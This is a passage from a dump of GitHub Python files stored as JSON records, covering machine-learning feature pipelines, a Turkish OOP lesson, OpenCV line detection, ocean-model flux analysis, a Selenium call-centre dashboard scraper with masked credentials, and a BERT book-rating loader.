len(x))\n\n\ntqdm.pandas(desc=\"topic2v...\")\nans_topic_vector['topic_vector'] = ans_topic_vector['topic'].progress_apply(lambda x: topic2v(x))\nprint('finished!')\nans_topic_vector.head()\nwith open('pkl/user_feat.pkl', 'rb') as file:\n user = pickle.load(file)\nuser.shape\ncolumns = ['uid']\n\ncolumns.append('inter_topic_vector')\nuser_topic = user[columns]\nuser_topic.head()\nanswer_q_topic_vector = pd.merge(user_topic, ans_topic_vector, on='uid')\nanswer_q_topic_vector.head()\nfor i in range(64):\n col_name = 'answer_q_topic_vector_{}'.format(str(i))\n tqdm.pandas(desc=\"topic_interest2v...\")\n ans_topic_vector[col_name] = ans_topic_vector['topic_vector'].apply(lambda x: listi(x, i))\n# %%\n# 模型训练\nimport pandas as pd\nimport numpy as np\nimport os\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.model_selection import StratifiedKFold\nfrom lightgbm import LGBMClassifier\nimport logging\nimport pickle\n\nwith open('pkl/data_vecor.pkl', 'rb') as file:\n data_a = pickle.load(file)\ndata_a.head()\nfeature_cols = [x for x in data_a.columns if x not in ('label', 'uid', 'qid', 'dt', 'day')]\n# target编码\n# train_label = train[(train['day'] > train_label_feature_end)]\n# print(len(train_label))\ntrain_label = 2593669\nX_train_all = data_a.iloc[:train_label][feature_cols]\ny_train_all = data_a.iloc[:train_label]['label']\ntest = data_a.iloc[train_label:]\n\nlogging.info(\"train shape %s, test shape %s\", X_train_all.shape, test.shape)\nprint(X_train_all.shape)\nprint(test.shape)\nmodel_lgb = LGBMClassifier(boosting_type='gbdt', num_leaves=64, learning_rate=0.01, n_estimators=2000,\n max_bin=425, subsample_for_bin=50000, objective='binary', min_split_gain=0,\n min_child_weight=5, min_child_samples=10, subsample=0.8, subsample_freq=1,\n colsample_bytree=1, reg_alpha=3, reg_lambda=5, seed=1000, n_jobs=-1, silent=True)\nfold = StratifiedKFold(n_splits=5, shuffle=True, random_state=42)\nfor index, (train_idx, val_idx) in enumerate(fold.split(X=X_train_all, y=y_train_all)):\n X_train, X_val, y_train, y_val = X_train_all.iloc[train_idx][feature_cols], X_train_all.iloc[val_idx][feature_cols], \\\n y_train_all.iloc[train_idx], \\\n y_train_all.iloc[val_idx]\n model_lgb.fit(X_train, y_train,\n eval_metric=['logloss', 'auc'],\n eval_set=[(X_val, y_val)],\n early_stopping_rounds=10)\nsub = pd.read_csv(f'data/invite_info_evaluate_1_0926.txt', sep='\\t', header=None)\nsub.columns = ['qid', 'uid', 'dt']\nsub['label'] = model_lgb.predict_proba(test[feature_cols])[:, 1]\nsub.to_csv('result.txt', index=None, header=None, sep='\\t')\n# %%\n","repo_name":"hqqiao/DataMiningCode","sub_path":"project-expert/expert-last.py","file_name":"expert-last.py","file_ext":"py","file_size_in_byte":14907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"72828156715","text":"# Object Oriented Programming -> Nesne tabanlı programlama\n\nclass Urun:\n def toplam_fiyat_hesapla(self,x,y):\n return x*y #fiyat * adet dönecek.\n\n\nurun = Urun()\n\nurun.ad = \"Telefon\"\nurun.fiyat = 5000\nurun.adet = 4\n\nprint(type(urun))\nprint(type(urun.ad))\nprint(type(urun.fiyat))\nprint(type(urun.adet))\n\n\ntoplam_fiyat = urun.toplam_fiyat_hesapla(urun.fiyat, urun.adet)\n\nprint(toplam_fiyat)\n\nurun2 = Urun()\nurun2.ad = \"Bilgisayar\"\nurun2.fiyat = 30000\nurun2.adet = 2\n\nprint(urun2.toplam_fiyat_hesapla(urun2.fiyat, urun2.adet))\n\n\nclass Dog:\n\n sehir = \"Adana\"\n\n #Constructor\n def __init__(self, ad, yas):\n self.ad = ad\n self.yas = yas\n\n def havla(self):\n print(f\"{self.ad} havlıyor.\")\n\n\nmy_dog = Dog(\"Karabaş\", 3)\ndog2 = Dog(\"Garip\", 5)\nmy_dog.havla()\n\nprint(my_dog.ad)\n\nprint(f\"{my_dog.ad} {my_dog.yas} yaşında.\")\n\nprint(Dog.__dict__)\nprint(my_dog.__dict__)\n\nprint(dog2.__dict__)\n\nprint(my_dog.sehir)","repo_name":"gul-cincik/Backend","sub_path":"ders6/oop.py","file_name":"oop.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"6481328356","text":"from __future__ import division\nimport cv2\nimport numpy as np\n\nclass Hough:\n\n\tdef __init__(self, image, points=None):\n\t\tself.points = points\n\t\tself.imageName = imageName\n\t\tself.image = None\n\n\tdef TransformImage(self):\n\t\tself.image = cv2.imread(self.imageName)\n\t\tgray = cv2.cvtColor(self.image,cv2.COLOR_BGR2GRAY)\n\t\tedges = cv2.Canny(gray,50,150,apertureSize = 3)\n\t\tcv2.imwrite('bremen-edges.png', edges)\n\t\treturn edges\n\n\tdef GetLineSegments(self, edges):\n\t\tsegments = []\n\t\tlines = cv2.HoughLinesP(edges, 1, np.pi/360, 70)\n\n\t\tfor x1, y1, x2, y2 in lines[0]:\n\t\t\t# print('line', line)\n\t\t\t# rho = line[0][0]\n\t\t\t# theta = line[0][1]\n\t\t\t# a = np.cos(theta)\n\t\t\t# b = np.sin(theta)\n\t\t\t# x0 = a*rho\n\t\t\t# y0 = b*rho\n\t\t\t# x1 = int(x0 + 1000*(-b))\n\t\t\t# y1 = int(y0 + 1000*(a))\n\t\t\t# x2 = int(x0 - 1000*(-b))\n\t\t\t# y2 = int(y0 - 1000*(a))\n\t\t\tsegments.append([(x1, y1), (x2, y2)])\n\n\t\treturn self.FormatForPolygonConversion(segments)\n\n\tdef DrawSegments(self, segments):\n\t\tsegments_only_image = np.zeros(self.image.shape)\n\n\t\tfor line in segments:\n\t\t\tcv2.line(segments_only_image,line[0],line[1],(0,200,0),1)\n\t\t\n\t\tcv2.imwrite('houghlines-bremen.jpg', segments_only_image)\n\n\n################################################################################\n\ndef main():\n\th = Hough(imageName='bremen_altstadt_final.png')\n\t# h = Hough(imageName='sudoku-original.jpg')\n\tedges = h.TransformImage()\n\n\th.image[h.image < 108] = 0\n\th.image[h.image >= 108] = 255\n\n\tsegments = h.GetLineSegments(cv2.cvtColor(h.image.astype(np.uint8), cv2.COLOR_BGR2GRAY))\n\t# h.DrawSegments(segments)\n\n\tprint('segments', segments)\n\nif __name__ == '__main__':\n main()\n\n################################################################################\n\ndef image_to_segments(image):\n\tRESOLUTION = 1\n\tNUMBER_OF_ANGLES = 180\n\tVOTES_REQUIRED_TO_COUNT_AS_A_LINE = 70\n\n\timage[image < 100] = 0\n\timage[image >= 100] = 255\n\timage = cv2.cvtColor(image.astype(np.uint8), cv2.COLOR_BGR2GRAY)\n\n\tsegments = []\n\tlines = cv2.HoughLinesP(\n\t\timage, \n\t\tRESOLUTION,\n\t\tnp.pi/NUMBER_OF_ANGLES, \n\t\tVOTES_REQUIRED_TO_COUNT_AS_A_LINE\n\t)\n\n\treturn np.array([[x1, y1, x2, y2] for x1, y1, x2, y2 in lines[0]])\n","repo_name":"BYU-PCCL/Serenity","sub_path":"points_to_segments/hough.py","file_name":"hough.py","file_ext":"py","file_size_in_byte":2133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"18487191371","text":"import functools\ndef addTwoDigits(n):\n \"\"\"\n You are given two strings pattern and s. The first string pattern contains only the symbols 0 and 1, and the second string s contains only lowercase English letters.\n\nLet's say that pattern matches a substring s[l..r] of s if the following 3 conditions are met:\n\nthey have equal length;\nfor each 0 in pattern the corresponding letter in the substring is a vowel;\nfor each 1 in pattern the corresponding letter is a consonant.\nYour task is to calculate the number of substrings of s that match pattern.\n \"\"\"\n list2=[]\n with open(\"text.txt\",'r+') as f:\n list1=f.readlines()\n mydict={}\n for item in list1:\n #item.strip()\n list2.append(item.strip().split(\",\"))\n\n print(list2)\n list3=[]\n for i in range(1,len(list2)):\n list3.append(dict(zip(list2[i],list2[0])))\n print(list3)\n list1 = [int(ch) for ch in str(n)]\n sum2=functools.reduce(lambda x,y:x+y ,list1)\n list1 =[int(ch) for ch in str(n)]\n x=list(map(lambda x:x**2,[2,3,4,5,6,7,8]))\n print(x)\n print(sum2)\n sum1 =0\n for item in list1:\n sum1=sum1+item\n print(sum1)\n return sum1\nif __name__==\"__main__\":\n print(addTwoDigits(29))\n","repo_name":"mthimmareddy/PythonPractice","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"3346703754","text":"\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport netCDF4\nimport octant\nimport octant.roms\n\nncfile = 'simulations/shelfstrat_M2_1.00e-06_N2_1.00e-04_f_1.00e-04/shelfstrat_his.nc'\n\nnc = netCDF4.Dataset(ncfile)\ntime = nc.variables['ocean_time'][:]/86400.0\n\ndelta = 0.1\n\nHMF = np.zeros((len(time), 129), 'd')\nVMF = np.zeros((len(time), 129), 'd')\nHBF = np.zeros((len(time), 129), 'd')\nVBF = np.zeros((len(time), 130), 'd')\n\nfor tidx in range(len(time)):\n zw = octant.roms.nc_depths(nc, 'w')[tidx]\n dz = np.diff(zw, axis=0)\n pm = nc.variables['pm'][:]\n pn = nc.variables['pn'][:]\n dV = dz/(pm*pn)\n\n rho0 = nc.variables['rho0'][:]\n rho = nc.variables['rho'][tidx]\n b = 9.8*(rho0-(1000.0+rho))/rho0\n bm = b.mean(axis=-1)[:, :, np.newaxis]\n bp = b - bm\n\n u = nc.variables['u'][tidx]\n um = u.mean(axis=-1)[:, :, np.newaxis]\n up = u - um\n\n vm = 0.0\n vp = nc.variables['v'][tidx]\n \n wp = nc.variables['w'][tidx, 1:-1]\n \n up, vp = octant.tools.shrink(up, vp)\n Uy = np.diff(um, axis=-2)/1000.0\n dVu = octant.tools.shrink(dV, up.shape)\n \n # U_y\n HMF[tidx, :] = np.sum( np.sum(dVu*up*vp, axis=-1) * Uy[:, :, 0], axis=0) \n\n zr = octant.roms.nc_depths(nc, 'rho')[tidx]\n Uz = np.diff(um, axis=0)/np.diff(zr, axis=0)\n \n wp_b, bp_b = octant.tools.shrink(wp, bp)\n dV_b = octant.tools.shrink(dV, wp_b.shape)\n \n # \n VBF[tidx, :] = np.sum( np.sum(dV_b*bp_b*wp_b, axis=-1) , axis=0) \n \n up_w, wp_w = octant.tools.shrink(up, wp)\n Uz_w = octant.tools.shrink(Uz, up_w.shape)\n dV_w = octant.tools.shrink(dV, up_w.shape)\n\n # U_z\n VMF[tidx, :] = np.sum( np.sum(dV_w*up_w*wp_w, axis=-1) * Uz_w[:, :, 0], axis=0) \n\n bp = octant.tools.shrink(bp, vp.shape)\n \n # (B_x / B_z)\n HBF[tidx, :] = np.sum( np.sum(dVu*bp*vp, axis=-1) * (1e-3/delta), axis=0) \n\n#\nnp.save('HMF', HMF.sum(axis=-1)/dV.sum())\nnp.save('VMF', VMF.sum(axis=-1)/dV_w.sum())\n\nnp.save('HBF', HBF.sum(axis=-1)/dVu.sum())\nnp.save('VBF', VBF.sum(axis=-1)/dV.sum())\n\n#\nfig = plt.figure(figsize=(8, 5))\nax = fig.add_subplot(111)\n\nax.plot(time, VBF.sum(axis=-1)/dV.sum(), '-r', lw=2)\nax.plot(time, HMF.sum(axis=-1)/dV.sum(), '-g', lw=2)\nax.plot(time, VMF.sum(axis=-1)/dV_w.sum(), '-b', lw=2)\nax.grid(True)\nax.set_xlabel('time [days]')\nax.text(9, 2e-8, r\"$$\", color='r')\n\n# ax.set_ylabel('Mean energy flux [m$^2$ s$^{-3}$]')\n# ax.text(15.5, 10.5, 'Horizontal eddy buoyancy flux', color='r')\n# ax.text(15.5, 0.5, 'Horizontal Reynolds stress', color='k')\n#\n# plt.savefig('energy_conversion.pdf')\n","repo_name":"hetland/shelfstrat","sub_path":"energy_conversion.py","file_name":"energy_conversion.py","file_ext":"py","file_size_in_byte":2589,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"15010438913","text":"from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nimport re\nimport sqlite3\nfrom datetime import datetime\nimport time\na = 0\n\n\n\n#--------sqlite connection---------\ncon = sqlite3.connect('b2c_wall(5).sqlite3')\ncon.cursor()\ncur= con.cursor()\ncur.execute('CREATE TABLE IF NOT EXISTS avg_minute(all_agents text ,Input_agent text,Talking text,Idle text,Pause text,Output_agent text,All_calls text,Waitings text,Holdtime text,time text)')\ncur.execute('CREATE TABLE IF NOT EXISTS avg_quarter(all_agents text ,Input_agent text,Talking text,Idle text,Pause text,Output_agent text,All_calls text,Waitings text,Holdtime text,Start text,End text)')\ncur.execute('CREATE TABLE IF NOT EXISTS avg_hour(all_agents text ,Input_agent text,Talking text,Idle text,Pause text,Output_agent text,All_calls text,Waitings text,Holdtime text,Start text,End text)')\n\n#---------selenium driver----------\nPATH = \"C:\\Program Files (x86)\\chromedriver.exe\"\ndriver = webdriver.Chrome(PATH)\ndriver.get(\"https://q1-panel.asiatech.ir/admin/SystemStatus/wall/\")\nusername = driver.find_element_by_id(\"UserUsername\")\nusername.send_keys(\"********\")#Enter username\npassword = driver.find_element_by_id(\"UserP\")\npassword.send_keys(\"@********\")#Enter Password\npassword.send_keys(Keys.ENTER)\n\n\n#----------Processing data----------\ntalking_minute = [] \nidle_minute = []\ninputing_agents_minute = []\noutput_agents_minutes = []\nall_agents_minutes = []\nwating_minutes =[]\nall_calls_minutes = []\nholdtime_sec = []\nholdtime_min = []\npause_minute = []\n\n#----------------------\ntalkin_quarter =[]\nidle_quarter = []\ninputing_agents_quarter =[]\noutput_agents_quarter = []\nall_agents_quarter =[]\nwating_quarter = []\nall_calls_quarter = []\nholdtime_min_quarter = []\nholdtime_sec_quarter = []\npause_quarter = []\n\n\n\n\nwhile True:\n a +=1\n print(a)\n wall = driver.find_elements_by_class_name(\"tablesorter\")\n\n\n search_list =[]\n idle = []\n talking = []\n pausee = []\n outputing_agents = [] \n inputing_agents = []\n all_agents = []\n waiting = []\n holdtime = []\n pause = []\n b2c =[]\n b2c_q = []\n b2c_h = []\n timing_withiut_second = 0\n\n\n\n #-----------------Data extraction with regax\n for i in wall:\n search_list.append(i.text)\n for i in search_list:\n resualt = re.findall(r'Idle .(\\d+)',i)\n if resualt:\n idle.append(int(resualt[0]))\n for i in search_list:\n resualt = re.findall(r'Talking .(\\d+)',i)\n if resualt:\n talking.append(int(resualt[0]))\n for i in search_list:\n resualt =re.findall(r'\\d+:\\d+:\\d+ (\\d+)',i)\n if resualt:\n inputing_agents.append(int(resualt[0]))\n outputing_agents.append(int(resualt[1]))\n all_agents.append(int(resualt[2]))\n for i in search_list:\n resualt = re.findall(r'B2C (\\d+) \\d+:\\d+:\\d+',i)\n if resualt:\n waiting.append(int(resualt[0]))\n for i in search_list:\n resualt = re.findall(r'B2C \\d+ (\\d+:\\d+:\\d+)',i)\n if resualt:\n holdtime.append(resualt[0])\n for i in search_list:\n resualt = re.findall(r'B2C \\d+ \\d+:\\d+:\\d+ \\d+ (\\d+)',i)\n if resualt:\n pause.append(int(resualt[0]))\n print('waitings:',waiting[0])\n print('talking:',talking[0])\n all_calls = waiting[0]+talking[0]\n\n\n #------------- Calculate time --------\n timing = datetime.now().time()\n timing_withiut_second = timing.strftime(\"%H:%M\")\n if len(idle_minute) == 0 :\n start_q = timing_withiut_second\n if len(idle_minute)==0 and len(idle_quarter) == 0:\n start_h = timing_withiut_second\n\n\n #---------Insert the extracted data list for insert to db-------------\n b2c.append(all_agents[0])\n b2c.append(inputing_agents[0])\n b2c.append(talking[0])\n b2c.append(idle[0])\n b2c.append(pause[0])\n b2c.append(outputing_agents[0])\n b2c.append(all_calls)\n b2c.append(waiting[0])\n b2c.append(holdtime[0])\n b2c.append(timing_withiut_second)\n \n\n #-----------To calculate the average--------------\n idle_minute.append(idle[0])\n talking_minute.append(talking[0])\n inputing_agents_minute.append(inputing_agents[0])\n output_agents_minutes.append(outputing_agents[0])\n all_agents_minutes.append(all_agents[0])\n wating_minutes.append(waiting[0])\n all_calls_minutes.append(all_calls) \n pause_minute.append(pause[0])\n #---------------Dedicate seconds from holdtime to calculate the average------------\n hold= re.findall(r'\\d+:\\d+:(\\d+)',holdtime[0])\n holdtime_sec.append(int(hold[0]))\n\n hold = re.findall(r'\\d+:(\\d+):\\d+',holdtime[0])\n holdtime_min.append(int(hold[0])) \n\n\n print(b2c)\n cur.execute('insert into avg_minute(all_agents,Input_agent,Talking,Idle,Pause,Output_agent,All_calls,Waitings,Holdtime,time) values (?,?,?,?,?,?,?,?,?,?)',b2c)\n con.commit()\n\n\n #-----------------calculate the average of quarter (15min) and insert to db-----------\n if len(idle_minute) == 15 and len(talking_minute)==15:\n avg_idle_quarter =round(sum(idle_minute)/len(idle_minute))\n avg_talking_quarter = round(sum(talking_minute)/len(talking_minute))\n avg_inputing_agents_quarter = round(sum(inputing_agents_minute)/len(inputing_agents_minute))\n avg_output_agents_quarter = round(sum(output_agents_minutes)/len(output_agents_minutes))\n avg_all_agents_quarter = round(sum(all_agents_minutes)/len(all_agents_minutes))\n avg_waiting_quarter = round(sum(wating_minutes)/len(wating_minutes))\n avg_all_calls_quarter = round(sum(all_calls_minutes)/len(all_calls_minutes))\n avg_pause_quarter = round(sum(pause_minute)/len(pause_minute))\n avg_holdtime_sec = round(sum(holdtime_sec)/len(holdtime_sec))\n avg_holdtime_min = round(sum(holdtime_min)/len(holdtime_min))\n\n\n\n idle_quarter.append(avg_idle_quarter)\n talkin_quarter.append(avg_talking_quarter)\n inputing_agents_quarter.append(avg_inputing_agents_quarter)\n output_agents_quarter.append(avg_output_agents_quarter)\n all_agents_quarter.append(avg_all_agents_quarter)\n wating_quarter.append(avg_waiting_quarter)\n all_calls_quarter.append(avg_all_calls_quarter)\n holdtime_min_quarter.append(avg_holdtime_min)\n holdtime_sec_quarter.append(avg_holdtime_sec)\n pause_quarter.append(avg_pause_quarter)\n\n\n\n idle_minute.clear()\n talking_minute.clear()\n inputing_agents_minute.clear()\n output_agents_minutes.clear()\n all_agents_minutes.clear()\n wating_minutes.clear()\n all_calls_minutes.clear()\n holdtime_sec.clear()\n holdtime_min.clear()\n pause_minute.clear()\n\n \n\n b2c_q.append(avg_all_agents_quarter)\n b2c_q.append(avg_inputing_agents_quarter)\n b2c_q.append(avg_talking_quarter)\n b2c_q.append(avg_idle_quarter)\n b2c_q.append(avg_pause_quarter)\n b2c_q.append(avg_output_agents_quarter)\n b2c_q.append(avg_all_calls_quarter)\n b2c_q.append(avg_waiting_quarter)\n minute = (f\"{str(avg_holdtime_min)}:{str(avg_holdtime_sec)}\")\n b2c_q.append(minute) \n b2c_q.append(start_q)\n b2c_q.append(timing_withiut_second)\n\n \n \n\n\n cur.execute('insert into avg_quarter(all_agents,Input_agent,Talking,Idle,Pause,Output_agent,All_calls,Waitings,Holdtime,Start,End) values (?,?,?,?,?,?,?,?,?,?,?)',b2c_q)\n con.commit()\n\n\n #------------- calculate the average of one hour and insert to db\n if len(talkin_quarter) == 4 and len(idle_quarter) == 4:\n avg_idle_hour =round( sum(idle_quarter)/len(idle_quarter))\n avg_talking_hour = round(sum(talkin_quarter)/len(talkin_quarter))\n avg_inputing_agents_hour = round(sum(inputing_agents_quarter)/len(inputing_agents_quarter))\n avg_output_agents_hour =round(sum(output_agents_quarter)/len(output_agents_quarter))\n avg_all_agents_hour = round(sum(all_agents_quarter)/len(all_agents_quarter))\n avg_waiting_hour = round(sum(wating_quarter)/len(wating_quarter))\n avg_all_calls_hour = round(sum(all_calls_quarter)/len(all_calls_quarter))\n avg_pause_hour = round(sum(pause_quarter)/len(pause_quarter))\n holdtime_sec_for_avg_hour = round(sum(holdtime_sec_quarter)/len(holdtime_sec_quarter))\n holdtime_min_for_avg_hour = round(sum(holdtime_min_quarter)/len(holdtime_min_quarter))\n avg_pause_hour = round(sum(pause_quarter)/len(pause_quarter))\n\n\n\n\n b2c_h.append(avg_all_agents_hour)\n b2c_h.append(avg_inputing_agents_hour)\n b2c_h.append(avg_talking_hour)\n b2c_h.append(avg_idle_hour)\n b2c_h.append(avg_pause_hour)\n b2c_h.append(avg_output_agents_hour)\n b2c_h.append(avg_all_calls_hour)\n b2c_h.append(avg_waiting_hour)\n hour = (f\"{str(holdtime_min_for_avg_hour)}:{str(holdtime_sec_for_avg_hour)}\")\n b2c_h.append(hour)\n b2c_h.append(start_h)\n b2c_h.append(timing_withiut_second)\n\n \n \n\n\n idle_quarter.clear()\n talkin_quarter.clear()\n inputing_agents_quarter.clear()\n output_agents_quarter.clear()\n all_agents_quarter.clear()\n wating_quarter.clear()\n all_calls_quarter.clear()\n holdtime_sec_quarter.clear()\n holdtime_min_quarter.clear()\n pause_quarter.clear()\n \n\n\n cur.execute('insert into avg_hour (all_agents,Input_agent,Talking,Idle,Pause,Output_agent,All_calls,Waitings,Holdtime,Start,End) values (?,?,?,?,?,?,?,?,?,?,?)',b2c_h)\n con.commit()\n print(timing_withiut_second)\n time.sleep(59)\n driver.refresh()","repo_name":"hoseynchegeni/CallCenter_LogManagement","sub_path":"wall.py","file_name":"wall.py","file_ext":"py","file_size_in_byte":9534,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"31773356839","text":"import os, sys, re, pickle\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport sklearn\nimport pandas as pd\nimport tensorflow as tf\nimport math\nfrom tensorflow import keras\nfrom transformers import BertTokenizer, BertConfig, TFBertModel\nfrom tqdm import tqdm\nprint(sys.version_info)\n\nfor module in tf, mpl, np, pd, sklearn, tf, keras:\n print(module.__name__, module.__version__)\n# 预训练模型来自于 https://github.com/huggingface/transformers\nORIGIN_DATA_DIR = os.getcwd() + '/all_fearures/BX-CSV-Dump/'\nFILTERED_DATA_DIR = os.getcwd() + '/tmp_bert/'\n#\nORIGIN_DATA_DIR = os.getcwd() + '/all_fearures/BX-CSV-Dump/'\nFILTERED_DATA_DIR = os.getcwd() + '/tmp_bert/'\n\n\nclass DataLoad:\n def __init__(self):\n '''\n books_with_blurbs.csv cloumns: ISBN,text,Author,Year,Publisher,Blurb\n BX-Book-Ratings.csv cloumns: User-ID,ISBN,Book-Rating\n BX-Books.csv cloumns: ISBN,Book-text,Book-Author,Year-Of-Publication,Publisher,Image-URL-S,Image-URL-M,Image-URL-L\n BX-Users.csv cloumns: User-ID,Location,Age\n '''\n self.BX_Users = self.load_origin('BX-Users')\n self.BX_Book_Ratings = self.load_origin('BX-Book-Ratings')\n self.books_with_blurbs = self.load_origin('books_with_blurbs', ',')\n # 合并三个表\n self.features = self.get_features()\n self.labels = self.features.pop('Book-Rating')\n\n def load_origin(self,\n filename: \"根据文件名获取源文件, 获取正确得columns、values等值\",\n sep: \"因为源文件的分隔方式sep不同, 所以通过传参改编分隔方式\" = \"\\\";\\\"\",\n ) -> pd.DataFrame:\n '''\n 获取原始数据,第一遍获取后将用pickle保存到本地,方便日后调用\n '''\n try:\n # 从缓存的文件夹FILTERED_DATA_DIR获取基本被过滤后的文件\n pickled_data = pickle.load(open(FILTERED_DATA_DIR + filename + '.p', mode='rb'))\n return pickled_data\n except FileNotFoundError:\n # 如果缓存的文件不存在或者没有,则在源目录ORIGIN_DATA_DIR获取\n all_fearures = pd.read_csv(ORIGIN_DATA_DIR + filename + '.csv', engine='python', sep=sep, encoding='utf-8')\n # \\\";\\\" 初始过滤的文件\n # , 初始不需要过滤的文件\n data_dict = {\"\\\";\\\"\": self.filtrator(all_fearures), ',': all_fearures}\n # 因为没获得处理后的文件,所以我们在获取源文件后可以保存一下处理后的文件\n pickle.dump((data_dict[sep]), open(FILTERED_DATA_DIR + filename + '.p', 'wb'))\n return data_dict[sep]\n except UnicodeDecodeError as e:\n ''' 测试时经常会出现编码错误,如果尝试更换编码方式无效,可以将编码错误的部分位置重新复制粘贴就可以了,这里我们都默认UTF-8'''\n print('UnicodeDecodeError:', e)\n except pd.errors.ParserError as e:\n print(\"connect error|pandas Error: %s\" % e)\n\n def filtrator(self,\n f_data: \"输入需要进行初步filter的数据\"\n ) -> pd.DataFrame:\n '''\n 源文件中的columns和各个值得第一列的第一个字符和最后一列的最后一个字符都带有双引号‘\"’,需要将其filter,Location字段当用户Age为null的时候,末尾会有\\\";NULL字符串 ,直接用切片调整\n '''\n Nonetype_age = 0\n f_data = f_data.rename(\n columns={f_data.columns[0]: f_data.columns[0][1:], f_data.columns[-1]: f_data.columns[-1][:-1]})\n f_data[f_data.columns[0]] = f_data[f_data.columns[0]].map(lambda v: v[1:] if v != None else Nonetype_age)\n f_data[f_data.columns[-1]] = f_data[f_data.columns[-1]].map(lambda v: v[:-1] if v != None else Nonetype_age)\n try:\n f_data = f_data[f_data['Location'].notnull()][\n f_data[f_data['Location'].notnull()]['Location'].str.contains('\\\";NULL')]\n f_data['Location'] = f_data['Location'].map(lambda location: location[:-6])\n except:\n pass\n return f_data\n\n def get_features(self):\n '''\n 获取整个数据集的所有features,并对每个文本字段作xxxxx\n User-ID\n Location\n ISBN\n Book-Rating\n Title\n Author\n Year\n Publisher\n Blurb\n '''\n try:\n # 从缓存的文件夹FILTERED_DATA_DIR获取features的文件\n pickled_data = pickle.load(open(FILTERED_DATA_DIR + 'features.p', mode='rb'))\n return pickled_data\n except FileNotFoundError:\n # 将所有的数据组成features大表\n all_fearures = pd.merge(pd.merge(self.BX_Users, self.BX_Book_Ratings), self.books_with_blurbs)\n # 因为没获得处理后的文件,所以我们在获取源文件后可以保存一下处理后的文件\n all_fearures.pop('Age')\n all_fearures['Title'] = self.feature2int(all_fearures['Title'], 'text', 15)\n all_fearures['Blurb'] = self.feature2int(all_fearures['Blurb'], 'text', 200)\n all_fearures['ISBN'] = self.feature2int(all_fearures['ISBN'], 'word')\n all_fearures['Author'] = self.feature2int(all_fearures['Author'], 'word')\n all_fearures['Publisher'] = self.feature2int(all_fearures['Publisher'], 'word')\n all_fearures['User-ID'] = self.feature2int(all_fearures['User-ID'], 'word')\n all_fearures['Year'] = self.feature2int(all_fearures['Year'], 'word')\n all_fearures['Location'] = self.feature2int(all_fearures['Location'], 'list')\n all_fearures['Book-Rating'] = all_fearures['Book-Rating'].astype('float32')\n pickle.dump(all_fearures, open(FILTERED_DATA_DIR + 'features.p', 'wb'))\n return all_fearures\n\n def feature2int(self,\n feature: '特征值',\n feature_type: 'text/word/list',\n length: '文本设置的最大长度' = 0,\n ):\n '''\n 将文本字段比如title、blurb只取英文单词,并用空格为分隔符,做成一个带index值的集合,并用index值表示各个单词,作为文本得表示\n '''\n pattern = re.compile(r'[^a-zA-Z]')\n filtered_map = {val: re.sub(pattern, ' ', str(val)) for ii, val in enumerate(set(feature))}\n\n word_map = {val: ii for ii, val in enumerate(set(feature))}\n\n try:\n cities = set()\n for val in feature.str.split(','):\n cities.update(val)\n city_index = {val: ii for ii, val in enumerate(cities)}\n list_map = {val: [city_index[row] for row in val.split(',')][:3] for ii, val in enumerate(set(feature))}\n except AttributeError:\n list_map = {}\n\n feature_dict = {\n 'text': feature.map(filtered_map),\n 'word': feature.map(word_map),\n 'list': feature.map(list_map),\n }\n return feature_dict[feature_type]\n\n def __del__(self):\n pass\n\n\norigin_DATA = DataLoad()\nmax_sequence_length = 512\nbert_path = './bert_models/'\n# title+blurb的最大长度\nblurb_series = origin_DATA.features.Blurb\ntitle_series = origin_DATA.features.Title\n\nclass pre_title_blurb():\n def __init__(self, lengths):\n self.max_sequence_length = lengths\n self.bert_path = './bert_models/'\n self.blurb_series = origin_DATA.features.Blurb\n self.title_series = origin_DATA.features.Title\n self.tokenizer = BertTokenizer.from_pretrained(self.bert_path+'bert-base-uncased-vocab.txt')\n self.input_ids, self.input_type_ids, self.input_masks = self.return_id()\n def return_id(self):\n input_ids, input_type_ids, input_masks = [], [], []\n for index in tqdm(range(math.ceil(blurb_series.shape[0]/10))):\n # 这个encode_plus可以帮助我们自动标记text,pos,segement的token\n inputs = self.tokenizer.encode_plus(text=title_series[index], text_pair=blurb_series[index], add_special_tokens=True,\n max_length=self.max_sequence_length, truncation_strategy='longest_first')\n # 我们需要手动补齐,得到三个向量对应的token\n padding_id = self.tokenizer.pad_token_id\n input_id = inputs['input_ids']\n padding_length = self.max_sequence_length-len(input_id)\n input_id = inputs['input_ids'] + [padding_id] * (padding_length)\n input_type_id = inputs['token_type_ids']\n input_type_id = input_type_id + [0] * padding_length\n input_mask = inputs['attention_mask']\n input_mask = input_mask + [0] * padding_length\n input_ids.append(input_id)\n input_type_ids.append(input_type_id)\n input_masks.append(input_mask)\n return np.array(input_ids), np.array(input_type_ids), np.array(input_masks)\n\ndata_blurb_title = pre_title_blurb(lengths=max_sequence_length)\n\nprint(data_blurb_title.input_ids.shape)\nprint(data_blurb_title.input_masks.shape)\nprint(data_blurb_title.input_type_ids.shape)\n\n# user-id的字典,总共有28836个用户\nall_user = len(set(origin_DATA.features['User-ID']))\nnew_user_id = {val: i for i, val in enumerate(set(origin_DATA.features['User-ID']))}\nprint('all user id = ', all_user)\n# location的数量=7573(从0开始的)\nall_location = max([j for i in origin_DATA.features.Location for j in i]) +1\nprint('all location = ', all_location)\n\n# ISBN总数\nall_isbn = len(set(origin_DATA.features['ISBN']))\nprint('all isbn = ', all_isbn)\n# author总数\nall_author = len(set(origin_DATA.features['Author']))\nprint('all author = ', all_author)\n# year总数\nall_year = len(set(origin_DATA.features['Year']))\nprint('all year = ', all_year)\n# publish总数\nall_publisher = len(set(origin_DATA.features['Publisher']))\nprint('all publisher = ', all_publisher)\n\n\ndef get_inputs():\n # 用户特征输入\n user_id = 